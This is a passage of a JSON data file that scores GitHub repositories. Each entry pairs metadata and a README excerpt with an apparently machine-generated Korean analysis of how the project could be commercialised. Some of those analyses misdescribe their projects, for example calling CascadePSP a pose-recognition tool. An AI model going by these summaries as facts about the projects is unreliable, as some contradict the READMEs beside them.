프로","readme_excerpt":"![\"The Evolution of Trust\"](https://i.imgur.com/kde760y.png)\n\n#\tPLAY IT HERE: [http://ncase.me/trust/](http://ncase.me/trust/)\n\n*The Evolution of Trust* is dedicated to the public domain, and is made thanks to the many Creative Commons & open source resources out there! Here is a full list of music, sounds, and code used:\n\n**Music:** \"Bleu\" by Komiku (CC Zero). [Download their full album on Free Music Archive](http://freemusicarchive.org/music/Komiku/Its_time_for_adventure_/)\n\n**Sound Effects:**\n\n* [Coin insert](https://freesound.org/people/bassmosphere/sounds/384700/) by bassmosphere (CC Zero)\n* [Coin get!](https://freesound.org/people/plasterbrain/sounds/242857/) by plasterbrain (CC Zero)\n* [Evil Laugh](https://freesound.org/people/JohnsonBrandEditing/sounds/173933/) by JohnsonBrandEditing (CC Zero)\n* [Slot machine](https://freesound.org/people/lukaso/sounds/69689/) by lukaso (CC Sampling+)\n* [Drumroll](https://freesound.org/people/adriann/sounds/191718/) by adriann (CC Zero)\n* [clic","composite_score":0.0979,"license_safety_tag":"unknown"},{"name":"lengseling/DistributedCrawling","github_url":"https://github.com/lengseling/DistributedCrawling","stars":7,"language":"Python","license":"unknown","abandonment_months":8,"description":"# DistributedCrawling 프로젝트 분석\n\n## 왜 보물인가\n여러 컴퓨터를 연결해 대량의 웹 데이터를 빠르게 수집하는 기술로, 데이터가 필요한 많은 비즈니스에서 구축하기 어려운 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 경쟁사 가격 모니터링 서비스로, 온라인 쇼핑몰 운영자들이 실시간으로 시장 가격 변동을 추적할 ","readme_excerpt":"1.项目数据在本目录数据里面 \n2.项目演示视频地址:http://v.youku.com/v_show/id_XMjg3Njc0NTc4NA==.html?spm=a2h3j.8428770.3416059.1#paction\n\n\n\n\n\n\n\n \n                                                        OneDirection \n","composite_score":0.0978,"license_safety_tag":"unknown"},{"name":"fanux/sealos","github_url":"https://github.com/fanux/sealos","stars":23,"language":"TypeScript","license":"NOASSERTION","abandonment_months":0,"description":"# fanux/sealos 평가 보고서\n\n## 왜 보물인가\n클라우드 컴퓨팅을 단순하게 설치하고 관리할 수 있게 만드는 도구로, 복잡한 서버 관리의 진입장벽을 크게 낮춥니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 스타트업이 고가의 클라우드 비용 대신 저비용으로 자신의 웹 서비스를 호스팅할 수 있는 기반 제공\n2. **내부 업무 도구*","readme_excerpt":"<div align=\"center\">\n\n  <a href=\"https://sealos.io\" target=\"_blank\" rel=\"noopener\">\n    <picture>\n      <source media=\"(prefers-color-scheme: dark)\" srcset=\"./docs/img/sealos-left-dark.png\" />\n      <source media=\"(prefers-color-scheme: light)\" srcset=\"./docs/img/sealos-left.png\" />\n      <img src=\"./docs/img/sealos-left.png\" />\n    </picture>\n  </a>\n  \n# 🚀 Develop, deploy, and scale in one seamless cloud platform ☁️\n\nSealos['siːləs] is an AI-native Cloud Operating System built on Kubernetes that unifies the entire application lifecycle, from development in cloud IDEs to production deployment and management. It is perfect for building and scaling modern AI applications, SaaS platforms, managed databases (MySQL, PostgreSQL, Redis, MongoDB) and complex microservice architectures.\n\n</div>\n\n<div align=\"center\">\n\n[![Open in Dev Container](https://img.shields.io/static/v1?label=Dev%20Container&message=Open&color=blue&logo=visualstudiocode)](https://vscode.dev/github/labring/sealos)\n[![Build ","composite_score":0.0978,"license_safety_tag":"unknown"},{"name":"thoughtbot/dotfiles","github_url":"https://github.com/thoughtbot/dotfiles","stars":5,"language":"Shell","license":"NOASSERTION","abandonment_months":2,"description":"# thoughtbot/dotfiles 분석 보고서\n\n## 왜 보물인가\n개발자들이 자신의 작업 환경을 빠르게 세팅할 수 있도록 도와주는 설정 파일 모음으로, 유명한 개발사(thoughtbot)에서 검증한 실용적인 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **개발 회사의 온보딩 솔루션**: 신입 개발자 입사 시 표준화된 작업 환경을 자동으로 설치해주는 ","readme_excerpt":"# thoughtbot dotfiles\n\n![prompt](http://images.thoughtbot.com/thoughtbot-dotfiles-prompt.png)\n\n## Requirements\n\nSet zsh as your login shell:\n\n    chsh -s $(which zsh)\n\n## Install\n\nClone onto your laptop:\n\n    git clone git@github.com:thoughtbot/dotfiles.git ~/dotfiles\n\n(Or, [fork and keep your fork\nupdated](http://robots.thoughtbot.com/keeping-a-github-fork-updated)).\n\nInstall [rcm](https://github.com/thoughtbot/rcm):\n\n    brew install rcm\n\nInstall the dotfiles:\n\n    env RCRC=$HOME/dotfiles/rcrc rcup\n\nAfter the initial installation, you can run `rcup` without the one-time variable\n`RCRC` being set (`rcup` will symlink the repo's `rcrc` to `~/.rcrc` for future\nruns of `rcup`). [See\nexample](https://github.com/thoughtbot/dotfiles/blob/master/rcrc).\n\nThis command will create symlinks for config files in your home directory.\nSetting the `RCRC` environment variable tells `rcup` to use standard\nconfiguration options:\n\n- Exclude the `README.md`, `README-ES.md` and `LICENSE` files, which are p","composite_score":0.0976,"license_safety_tag":"unknown"},{"name":"chrisvfritz/vue-enterprise-boilerplate","github_url":"https://github.com/chrisvfritz/vue-enterprise-boilerplate","stars":6,"language":"SCSS","license":"unknown","abandonment_months":4,"description":"# Vue Enterprise Boilerplate 평가 보고서\n\n## 왜 보물인가\n대규모 웹 프로젝트를 빠르게 시작할 수 있도록 미리 구성해놓은 '건축 설계도'로, 처음부터 모든 것을 만드는 것보다 훨씬 빠르고 안정적입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업용 관리 대시보드나 협업 도구 같은 복잡한 웹 애플리케이션을 빠르게 출","readme_excerpt":"# Vue Enterprise Boilerplate v3 (alpha)\n\nThis repo is currently in active development and considered in alpha release.\n\n> This is an ever-evolving, opinionated architecture and dev environment for new Vue 3 + Vite SPA projects using [create-vue](https://github.com/vuejs/create-vue).\n\n🎩 A huge thanks to [Chris Fritz](https://twitter.com/chrisvfritz) for the incredible work that this work builds upon. For those looking for his version, see [this branch for the original Vue 2 enterprise boilerplate](https://github.com/bencodezen/vue-enterprise-boilerplate/tree/vue-2-version).\n\n## Recommended IDE Setup\n\n[VSCode](https://code.visualstudio.com/) + [Volar](https://marketplace.visualstudio.com/items?itemName=Vue.volar) (and disable Vetur) + [TypeScript Vue Plugin (Volar)](https://marketplace.visualstudio.com/items?itemName=Vue.vscode-typescript-vue-plugin).\n\n## Type Support for `.vue` Imports in TS\n\nTypeScript cannot handle type information for `.vue` imports by default, so we replace the `tsc","composite_score":0.0975,"license_safety_tag":"unknown"},{"name":"srsLTE/srsLTE","github_url":"https://github.com/srsLTE/srsLTE","stars":13,"language":"C++","license":"AGPL-3.0","abandonment_months":4,"description":"# srsLTE/srsLTE 분석 보고서\n\n## 왜 보물인가\n휴대폰 통신 기술을 누구나 사용할 수 있도록 만든 오픈소스 프로젝트로, 통신사 없이도 5G/LTE 네트워크 실험과 개발이 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **통신 교육 플랫폼**: 대학교와 통신 관련 학원이 학생들에게 5G/LTE 기술을 직접 실습하게 해주는 온라인 강좌\n2. **통신","readme_excerpt":"srsRAN\n======\n\n[![Build Status](https://github.com/srsran/srsRAN_4G/actions/workflows/ccpp.yml/badge.svg)](https://github.com/srsran/srsRAN_4G/actions/workflows/ccpp.yml)\n[![CodeQL](https://github.com/srsran/srsRAN_4G/actions/workflows/codeql.yml/badge.svg)](https://github.com/srsran/srsRAN_4G/actions/workflows/codeql.yml)\n\nsrsRAN is an open source 4G software radio suite developed by [SRS](http://www.srs.io). For 5G RAN, see our new O-RAN CU/DU solution - [srsRAN Project](https://www.github.com/srsran/srsran_project).\n\nSee the [srsRAN 4G project pages](https://www.srsran.com) for information, guides and project news.\n\nThe srsRAN suite includes:\n  * srsUE - a full-stack SDR 4G UE application with prototype 5G features\n  * srsENB - a full-stack SDR 4G eNodeB application\n  * srsEPC - a light-weight 4G core network implementation with MME, HSS and S/P-GW\n\nFor application features, build instructions and user guides see the [srsRAN 4G documentation](https://docs.srsran.com/projects/4g/).\n\n","composite_score":0.0973,"license_safety_tag":"risky"},{"name":"resin-io/etcher","github_url":"https://github.com/resin-io/etcher","stars":16,"language":"TypeScript","license":"apache-2.0","abandonment_months":0,"description":"# Resin.io Etcher 상용화 분석\n\n## 왜 보물인가\nUSB나 SD카드에 운영체제를 쉽게 설치해주는 도구로, 컴퓨터 초보자도 복잡한 과정 없이 기기를 셋업할 수 있게 만든다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 교육기관이 수백 대의 라즈베리파이를 한 번에 설치하는 클라우드 관리 서비스\n2. **내부 업무 도구**: IT팀이 ","readme_excerpt":"# Etcher\n\n> Flash OS images to SD cards & USB drives, safely and easily.\n\nEtcher is a powerful OS image flasher built with web technologies to ensure\nflashing an SDCard or USB drive is a pleasant and safe experience. It protects\nyou from accidentally writing to your hard-drives, ensures every byte of data\nwas written correctly, and much more. It can also directly flash Raspberry Pi devices that support [USB device boot mode](https://www.raspberrypi.com/documentation/computers/raspberry-pi.html#usb-device-boot-mode).\n\n[![Current Release](https://img.shields.io/github/release/balena-io/etcher.svg?style=flat-square)](https://balena.io/etcher)\n[![License](https://img.shields.io/github/license/balena-io/etcher.svg?style=flat-square)](https://github.com/balena-io/etcher/blob/master/LICENSE)\n[![Balena.io Forums](https://img.shields.io/discourse/https/forums.balena.io/topics.svg?style=flat-square&label=balena.io%20forums)](https://forums.balena.io/c/etcher)\n\n---\n\n[**Download**][etcher] | [**Su","composite_score":0.097,"license_safety_tag":"safe"},{"name":"DivanteLtd/vue-storefront","github_url":"https://github.com/DivanteLtd/vue-storefront","stars":7,"language":"","license":"mit","abandonment_months":1,"description":"# Vue Storefront 분석 리포트\n\n## 왜 보물인가\n온라인 쇼핑몰을 빠르고 쉽게 만들 수 있는 오픈소스 기반 기술로, 누구나 자신의 쇼핑몰을 운영할 수 있도록 도와줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 쇼핑몰 빌더 플랫폼**\n- 중소 사업가들이 코딩 없이 자신의 온라인 스토어를 구축할 수 있는 월 구독 서비스로 제공\n\n*","readme_excerpt":"<br />\n\n![Alokai](https://res.cloudinary.com/vue-storefront/image/upload/v1710754524/Logo_green_2x_z4vmhz.png)\n\n<h3 align=\"center\">\n  <strong>An ecosystem of developer tools that accelerate and simplify building eCommerce Storefronts</strong>\n</h3>\n<p align=\"center\">\n    Fully customizable, backend-agnostic with     <a href=\"https://alokai.com/live-projects/?utm_source=github.com&utm_medium=referral&utm_campaign=readme\">\n          3500+ Live Stores!\n    </a>\n</p>\n\n<p align=\"center\">\n     <a href=\"https://docs.alokai.com/\">\n        Documentation\n    </a>\n</p>\n\n<p align=\"center\">\n\n</p>\n\n<p align=\"center\">\n  <a href=\"https://github.com/vuestorefront/vue-storefront/\">\n    <img alt=\"GitHub Repository Stars Count\" src=\"https://img.shields.io/github/stars/vuestorefront/vue-storefront?style=social\" />\n  </a>\n    <a href=\"https://twitter.com/usealokai\">\n        <img alt=\"Follow Us on Twitter\" src=\"https://img.shields.io/twitter/follow/useAlokai?style=social\" />\n    </a>\n    <a href=\"https://www","composite_score":0.097,"license_safety_tag":"safe"},{"name":"microsoft/code-with-engineering-playbook","github_url":"https://github.com/microsoft/code-with-engineering-playbook","stars":5,"language":"Dockerfile","license":"CC-BY-4.0","abandonment_months":4,"description":"# microsoft/code-with-engineering-playbook 분석\n\n## 왜 보물인가\nMicrosoft가 만든 소프트웨어 개발 팀의 일하는 방식을 정리한 가이드북으로, 회사나 팀이 체계적으로 일할 수 있는 방법을 배울 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발 교육 플랫폼**: 신입 개발자나 비개발자 팀원들을 위한 온라인 교육 ","readme_excerpt":"# ISE Engineering Fundamentals Customer/Partner Engineering Playbook\n\nAn engineer or data scientist working on an [ISE](docs/ISE.md) project...\n\n* Has responsibilities to their team – mentor, coach, and lead.\n* Knows their **playbook**. Follows their playbook. Fixes their playbook if it is broken. If they find a better playbook, they copy it. If somebody could use your playbook, give them yours.\n* Leads by example. Models the behaviors we desire both interpersonally and technically.\n* Strives to understand how their work fits into a broader context and ensures the outcome.\n\nThis is our playbook. All contributions welcome! Please feel free to submit a [pull request](https://github.com/microsoft/code-with-engineering-playbook/pulls) to get involved.\n\n> **Note:** If you are reading this on GitHub - head over to [https://microsoft.github.io/code-with-engineering-playbook/](https://microsoft.github.io/code-with-engineering-playbook/) for a better reading experience\n\n## Why Have A Playbook\n\n","composite_score":0.0969,"license_safety_tag":"unknown"},{"name":"kartik-v/bootstrap-fileinput","github_url":"https://github.com/kartik-v/bootstrap-fileinput","stars":5,"language":"JavaScript","license":"NOASSERTION","abandonment_months":0,"description":"# bootstrap-fileinput 상용화 분석\n\n## 왜 보물인가\n웹사이트에서 파일을 업로드할 때 사용자 경험을 크게 향상시키는 도구로, 전 세계 수많은 웹사이트에서 기본 기능처럼 사용되고 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스 - 클라우드 스토리지 플랫폼**\n- 개인/기업용 파일 보관함에 우수한 파일 업로드 인터페이스를 제공","readme_excerpt":"<h1 align=\"center\">\r\n    <a href=\"http://plugins.krajee.com\" title=\"Krajee Plugins\" target=\"_blank\">\r\n        <img src=\"https://kartik-v.github.io/bootstrap-fileinput-samples/samples/krajee-logo-b.png\" alt=\"Krajee Logo\"/>\r\n    </a>\r\n    <br>\r\n    bootstrap-fileinput\r\n    <hr>\r\n    <a href=\"https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=DTP3NZQ6G2AYU\"\r\n       title=\"Donate via Paypal\" target=\"_blank\"><img height=\"60\" src=\"https://kartik-v.github.io/bootstrap-fileinput-samples/samples/donate.png\" alt=\"Donate\"/></a>\r\n    &nbsp; &nbsp; &nbsp;\r\n    <a href=\"https://www.buymeacoffee.com/kartikv\" title=\"Buy me a coffee\" ><img src=\"https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png\" height=\"60\" alt=\"kartikv\" /></a>\r\n</h1>\r\n\r\n<div align=\"center\">\r\n\r\n[![Financial Contributors on Open Collective](https://opencollective.com/bootstrap-fileinput/all/badge.svg?label=financial+contributors)](https://opencollective.com/bootstrap-fileinput)\r\n[![Latest Stable Version](https:","composite_score":0.0966,"license_safety_tag":"unknown"},{"name":"hkchengrex/CascadePSP","github_url":"https://github.com/hkchengrex/CascadePSP","stars":10,"language":"Python","license":"MIT","abandonment_months":5,"description":"# CascadePSP 보물 분석\n\n## 왜 보물인가\n사진이나 영상에서 사람의 자세와 움직임을 자동으로 인식하는 기술로, 스포츠 분석·재활 운동·영상 제작 등 다양한 산업에서 수요가 높습니다.\n\n## 어디에 쓸 수 있나\n1. **피트니스 앱**: 헬스장에서 사용자의 운동 자세를 실시간으로 분석하고 피드백하는 SaaS 서비스\n2. **체육관 관리 도구**: ","readme_excerpt":"# CascadePSP: Toward Class-Agnostic and Very High-Resolution Segmentation via Global and Local Refinement\n\n[Ho Kei Cheng*](https://hkchengrex.github.io/), Jihoon Chung*, Yu-Wing Tai, Chi-Keung Tang\n\n[[arXiv]](https://arxiv.org/abs/2005.02551) [[PDF]](https://arxiv.org/pdf/2005.02551)\n\n[[Supplementary Information (Comparisons with DenseCRF included!)]](https://openaccess.thecvf.com/content_CVPR_2020/supplemental/Cheng_CascadePSP_Toward_Class-Agnostic_CVPR_2020_supplemental.pdf)\n\n[[Supplementary image results]](http://hkchengad.student.ust.hk/CascadePSP/CascadePSP-supp-images.pdf)\n\n![gif](https://imgur.com/AD68ES8.gif)\n\n## Introduction\n\nCascadePSP is a deep learning model for high-resolution segmentation refinement.\nThis repository contains our PyTorch implementation with both training and testing functionalities. We also provide the annotated UHD dataset **BIG** and the pretrained model.\n\nHere are some refinement results on high-resolution images.\n![teaser](docs/images/teaser.jpg)\n\n## Q","composite_score":0.0965,"license_safety_tag":"safe"},{"name":"jbarlow83/OCRmyPDF","github_url":"https://github.com/jbarlow83/OCRmyPDF","stars":6,"language":"Python","license":"gpl-3.0","abandonment_months":0,"description":"# OCRmyPDF 보물지도\n\n## 왜 보물인가\n스캔한 종이 문서나 이미지 파일을 검색 가능한 PDF로 변환해주는 도구로, 수많은 기업과 개인이 필요로 하는 기본적이면서도 중요한 기능입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 법무사무소, 회계법인 등이 고객 제출 서류를 자동으로 정리하는 클라우드 플랫폼\n2. **내부 업무 도구**: ","readme_excerpt":"<!-- SPDX-FileCopyrightText: 2014 Julien Pfefferkorn -->\n<!-- SPDX-FileCopyrightText: 2015 James R. Barlow -->\n<!-- SPDX-License-Identifier: CC-BY-SA-4.0 -->\n\n<img src=\"docs/images/logo.svg\" width=\"240\" alt=\"OCRmyPDF\">\n\n[![Build Status](https://github.com/ocrmypdf/OCRmyPDF/actions/workflows/build.yml/badge.svg)](https://github.com/ocrmypdf/OCRmyPDF/actions/workflows/build.yml) [![PyPI version][pypi]](https://pypi.org/project/ocrmypdf/) ![Homebrew version][homebrew] ![ReadTheDocs][docs] ![Python versions][pyversions]\n\n[pypi]: https://img.shields.io/pypi/v/ocrmypdf.svg \"PyPI version\"\n[homebrew]: https://img.shields.io/homebrew/v/ocrmypdf.svg \"Homebrew version\"\n[docs]: https://readthedocs.org/projects/ocrmypdf/badge/?version=latest \"RTD\"\n[pyversions]: https://img.shields.io/pypi/pyversions/ocrmypdf \"Supported Python versions\"\n\nOCRmyPDF adds an OCR text layer to scanned PDF files, allowing them to be searched or copy-pasted.\n\n```bash\nocrmypdf                      # it's a scriptable comman","composite_score":0.0962,"license_safety_tag":"restricted"},{"name":"eooce/2go-for-shuttle","github_url":"https://github.com/eooce/2go-for-shuttle","stars":82,"language":"Rust","license":"NOASSERTION","abandonment_months":7,"description":"","readme_excerpt":"","composite_score":0.0957,"license_safety_tag":"unknown"},{"name":"tensorflow/tfjs-examples","github_url":"https://github.com/tensorflow/tfjs-examples","stars":5,"language":"JavaScript","license":"apache-2.0","abandonment_months":0,"description":"# TensorFlow.js 예제 저장소 분석\n\n## 왜 보물인가\n인공지능을 웹브라우저에서 직접 실행할 수 있게 해주는 실전 학습 자료로, 기술 기업들의 AI 도입 진입장벽을 낮춰줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 클라우드 없이 브라우저에서 작동하는 이미지 분석 및 음성 인식 도구를 웹앱으로 제공\n2. **내부 업무 도구**","readme_excerpt":"# TensorFlow.js Examples\n\nThis repository contains a set of examples implemented in\n[TensorFlow.js](http://js.tensorflow.org).\n\nEach example directory is standalone so the directory can be copied\nto another project.\n\n# Overview of Examples\n\n<table>\n  <tr>\n    <th>Example name</th>\n    <th>Demo link</th>\n    <th>Input data type</th>\n    <th>Task type</th>\n    <th>Model type</th>\n    <th>Training</th>\n    <th>Inference</th>\n    <th>API type</th>\n    <th>Save-load operations</th>\n  <tr>\n    <td><a href=\"./abalone-node\">abalone-node</a></td>\n    <td></td>\n    <td>Numeric</td>\n    <td>Loading data from local file and training in Node.js</td>\n    <td>Multilayer perceptron</td>\n    <td>Node.js</td>\n    <td>Node.js</td>\n    <td>Layers</td>\n    <td>Saving to filesystem and loading in Node.js</td>\n  </tr>\n  <tr>\n    <td><a href=\"./addition-rnn\">addition-rnn</a></td>\n    <td><a href=\"https://storage.googleapis.com/tfjs-examples/addition-rnn/dist/index.html\">🔗</a></td>\n    <td>Text</td>\n    <td>Se","composite_score":0.0956,"license_safety_tag":"safe"},{"name":"geerlingguy/ansible-collection-mac","github_url":"https://github.com/geerlingguy/ansible-collection-mac","stars":6,"language":"Shell","license":"MIT","abandonment_months":5,"description":"# geerlingguy/ansible-collection-mac 분석\n\n## 왜 보물인가\nMac 컴퓨터를 자동으로 설정하고 관리해주는 도구로, IT 담당자들이 반복적인 작업에서 해방될 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: Mac 기반 개발팀을 위한 클라우드 기반 컴퓨터 자동 셋업 서비스\n- **내부 업무 도구**: 기업의 ","readme_excerpt":"# Mac Collection for Ansible\n\n[![MIT licensed][badge-license]][link-license]\n[![Galaxy Collection][badge-collection]][link-galaxy]\n[![CI][badge-gh-actions]][link-gh-actions]\n\nThis collection includes helpful Ansible roles and content to help with macOS automation. For a good example of the collection's usage, see the [Mac Dev Playbook](https://github.com/geerlingguy/mac-dev-playbook).\n\nRoles included in this collection (click on the link to see the role's README and documentation):\n\n  - `geerlingguy.mac.homebrew` ([documentation](https://github.com/geerlingguy/ansible-collection-mac/blob/master/roles/homebrew/README.md))\n  - `geerlingguy.mac.mas` ([documentation](https://github.com/geerlingguy/ansible-collection-mac/blob/master/roles/mas/README.md))\n  - `geerlingguy.mac.dock` ([documentation](https://github.com/geerlingguy/ansible-collection-mac/blob/master/roles/dock/README.md))\n\n## Installation\n\nInstall via Ansible Galaxy:\n\n```\nansible-galaxy collection install geerlingguy.mac\n```\n\nO","composite_score":0.0956,"license_safety_tag":"safe"},{"name":"DIG-Kaust/Seismology","github_url":"https://github.com/DIG-Kaust/Seismology","stars":7,"language":"Jupyter Notebook","license":"unknown","abandonment_months":5,"description":"# DIG-Kaust/Seismology 분석\n\n## 왜 보물인가\n지진 데이터를 분석하고 해석하는 과학적 도구를 제공하여, 지진 연구와 지진 안전 예측에 필수적인 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 지진 모니터링 SaaS 서비스**\n지진학자, 건설사, 보험사가 실시간으로 지진 데이터를 분석하고 위험도를 평가하는 웹 기반 플랫폼 제공\n\n**2.","readme_excerpt":"![Seismology](https://github.com/DIG-Kaust/Seismology/blob/main/logo.png)\n\nTeaching material for ErSE 210 Seismology course to be held at KAUST during the Fall semester.\n\n## Material\n\nThe repository is organized as follows:\n\n- **Slides**: deck of slides summarizing the key concept introduced in each class. Some of the figures in these slides are taken from the reference textbook (Shearer, P., Introduction to Seismology). \n- **Data**: input data used in the practical sessions:\n- All of the other folders in this repository contains Python codes and Jupyter Notebooks used in the practical sessions:\n\n   - [**PlaneWave**](https://github.com/DIG-Kaust/Seismology/blob/main/PlaneWave/PlaneWave.ipynb): create and display plane waves in time-space and wavenumber domain.\n   - [**GassmannFluidSub**](https://github.com/DIG-Kaust/Seismology/blob/main/GassmannFluidSub/Gassmann.ipynb): implement basic rock physics equations and Gassmann substitution and apply it to the Smehaia well log.\n   - [**Seismi","composite_score":0.0956,"license_safety_tag":"unknown"},{"name":"jetstack/cert-manager","github_url":"https://github.com/jetstack/cert-manager","stars":6,"language":"Go","license":"apache-2.0","abandonment_months":0,"description":"# Cert-Manager 상용화 분석\n\n## 왜 보물인가\n웹사이트의 보안 인증서를 자동으로 관리해주는 도구로, 기업들이 매년 수백만 원대의 인증서 비용과 관리 수고를 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객사 웹사이트의 SSL 인증서를 일괄 관리하는 보안 관리 플랫폼\n2. **내부 업무 도구**: 기업 내부 ","readme_excerpt":"<p align=\"center\">\n  <img src=\"./logo/logo-small.png\" height=\"256\" width=\"256\" alt=\"cert-manager project logo\" />\n</p>\n<!-- note that the cert-manager logo in this repo is referred to in other README files in the cert-manager org\n     as well as in Helm charts, etc.\n     if you change its location or name, you'll need to update several other repos too! -->\n\n<p align=\"center\"><a href=\"https://prow.infra.cert-manager.io/?job=ci-cert-manager-master-make-test\">\n<!-- prow build badge, godoc, and go report card-->\n<img alt=\"Build Status\" src=\"https://prow.infra.cert-manager.io/badge.svg?jobs=ci-cert-manager-master-make-test\">\n</a>\n<a href=\"https://pkg.go.dev/github.com/cert-manager/cert-manager\"><img src=\"https://pkg.go.dev/badge/github.com/cert-manager/cert-manager.svg\" alt=\"Go Reference\"></a>\n<a href=\"https://goreportcard.com/report/github.com/cert-manager/cert-manager\"><img alt=\"Go Report Card\" src=\"https://goreportcard.com/badge/github.com/cert-manager/cert-manager\" /></a>\n<br />\n<a href","composite_score":0.0956,"license_safety_tag":"safe"},{"name":"DayBreak-u/chineseocr_lite","github_url":"https://github.com/DayBreak-u/chineseocr_lite","stars":21,"language":"C++","license":"GPL-2.0","abandonment_months":1,"description":"# DayBreak-u/chineseocr_lite 분석\n\n## 왜 보물인가\n사진이나 문서의 중국어 글씨를 자동으로 읽고 텍스트로 변환하는 기술로, 국제 무역, 물류, 문서 처리 업계에서 수작업을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 중국어 영수증 자동 처리 플랫폼**\n- 이커머스·물류회사가 중국 공급처 영수","readme_excerpt":"<p align=\"center\">\n  <img src=\"assets/chineseocr-lite-logo-wide.png\" alt=\"ChineseOCR Lite\" width=\"760\">\n</p>\n\n<p align=\"center\">\n  <a href=\"#cli-使用\">CLI</a> ·\n  <a href=\"#启动-web-服务\">Web Demo</a> ·\n  <a href=\"#模型文件\">Models</a> ·\n  <a href=\"#多端-demo\">Multi-platform Demo</a>\n</p>\n\n轻量级中文 OCR 项目，当前分支以 ONNX Runtime 推理为主，包含 Web 服务、Python 推理代码，以及 C++、JVM、Android、.NET 等多端 Demo。\n\n## 功能\n\n- 中文 OCR 文字检测与识别\n- ONNX Runtime CPU 推理\n- Tornado Web 服务与前端展示页面\n- Android、C++、JVM、.NET 多端参考 Demo\n- 附带轻量模型文件，便于本地快速试跑\n\n## 环境\n\n推荐环境：\n\n- Python 3.6\n- Windows、Linux 或 macOS\n- CPU 推理，无需 CUDA\n\n安装依赖：\n\n```bash\npip install -r requirements.txt\n```\n\n## 启动 Web 服务\n\n```bash\ncd chineseocr_lite\npython backend/main.py\n```\n\n服务默认监听 `8089` 端口。启动后终端会输出类似：\n\n```text\nserver is running: 192.168.x.x:8089\n```\n\n在浏览器打开该地址即可使用 Web OCR 页面。\n\n## CLI 使用\n\n当前项目也可以作为命令行 OCR 工具使用，适合被 agent、脚本或批处理任务调用。\n\n本地开发安装：\n\n```bash\npip install -e .\n```\n\n识别单张图片并输出 JSON：\n\n```bash\nchineseocr test_imgs/res.jpg\n```\n\n写入 JSON 文件：\n\n```bash\nchineseocr test_imgs/res.jpg --o","composite_score":0.0955,"license_safety_tag":"restricted"},{"name":"acmenlt/dynamic-threadpool","github_url":"https://github.com/acmenlt/dynamic-threadpool","stars":53,"language":"Java","license":"Apache-2.0","abandonment_months":2,"description":"# Dynamic Threadpool 프로젝트 분석\n\n## 왜 보물인가\n컴퓨터가 여러 작업을 동시에 처리할 때 효율을 높이고 비용을 절감하는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **클라우드 서비스 제공 업체**: AWS, 네이버 클라우드 같은 서비스에서 서버 자원을 더 효율적으로 관리하는 기술로 판매\n2. **금융 거래 플랫폼**: 주식/암","readme_excerpt":"\n## 动态可观测线程池，提高系统运行保障能力\n\n\n[![License](https://img.shields.io/badge/license-Apache--2.0-blue.svg)](http://www.apache.org/licenses/LICENSE-2.0)\n[![Build Status](https://github.com/opengoofy/hippo4j/actions/workflows/ci.yml/badge.svg?event=push)](https://github.com/opengoofy/hippo4j)\n\n![](https://img.shields.io/github/stars/opengoofy/hippo4j?color=5470c6)\n![](https://img.shields.io/github/forks/opengoofy/hippo4j?color=3ba272)\n![](https://img.shields.io/github/contributors/opengoofy/hippo4j)\n[![star](https://gitcode.com/opengoofy/hippo4j/star/badge.svg)](https://gitcode.com/opengoofy/hippo4j)\n[![Docker Pulls](https://img.shields.io/docker/pulls/hippo4j/hippo4j-server.svg?label=docker%20pulls&color=fac858)](https://store.docker.com/community/images/hippo4j/hippo4j-server)\n[![codecov](https://codecov.io/gh/opengoofy/hippo4j/branch/develop/graph/badge.svg?token=WBUVJN107I)](https://codecov.io/gh/opengoofy/hippo4j)\n[![EN doc](https://img.shields.io/badge/readme-English-orange.svg)](https://git","composite_score":0.0953,"license_safety_tag":"safe"},{"name":"Workiva/go-datastructures","github_url":"https://github.com/Workiva/go-datastructures","stars":5,"language":"Go","license":"apache-2.0","abandonment_months":3,"description":"# Workiva/go-datastructures 상품화 분석\n\n## 왜 보물인가\n대량의 데이터를 빠르게 정렬하고 관리하는 기술로, 금융·의료·물류 등 데이터 많은 기업들의 업무 속도를 획기적으로 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 클라우드 기반 데이터 분석 플랫폼**\n- 엑셀 파일, 데이터베이스의 수백만 행을 초단위","readme_excerpt":"go-datastructures\n=================\n\nGo-datastructures is a collection of useful, performant, and threadsafe Go\ndatastructures.\n\n### NOTE: only tested with Go 1.3+.\n\n#### Augmented Tree\n\nInterval tree for collision in n-dimensional ranges.  Implemented via a\nred-black augmented tree.  Extra dimensions are handled in simultaneous\ninserts/queries to save space although this may result in suboptimal time\ncomplexity.  Intersection determined using bit arrays.  In a single dimension,\ninserts, deletes, and queries should be in O(log n) time.\n\n#### Bitarray\n\nBitarray used to detect existence without having to resort to hashing with\nhashmaps.  Requires entities have a uint64 unique identifier.  Two\nimplementations exist, regular and sparse.  Sparse saves a great deal of space\nbut insertions are O(log n).  There are some useful functions on the BitArray\ninterface to detect intersection between two bitarrays. This package also\nincludes bitmaps of length 32 and 64 that provide increased speed and","composite_score":0.0948,"license_safety_tag":"safe"},{"name":"RobinHerbots/Inputmask","github_url":"https://github.com/RobinHerbots/Inputmask","stars":5,"language":"JavaScript","license":"mit","abandonment_months":1,"description":"# Inputmask 저장소 분석\n\n## 왜 보물인가\n웹사이트에서 사용자가 전화번호, 신용카드, 날짜 등을 입력할 때 자동으로 형식을 맞춰주는 편의 기능으로, 사용자 경험을 크게 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **금융 회사의 온라인 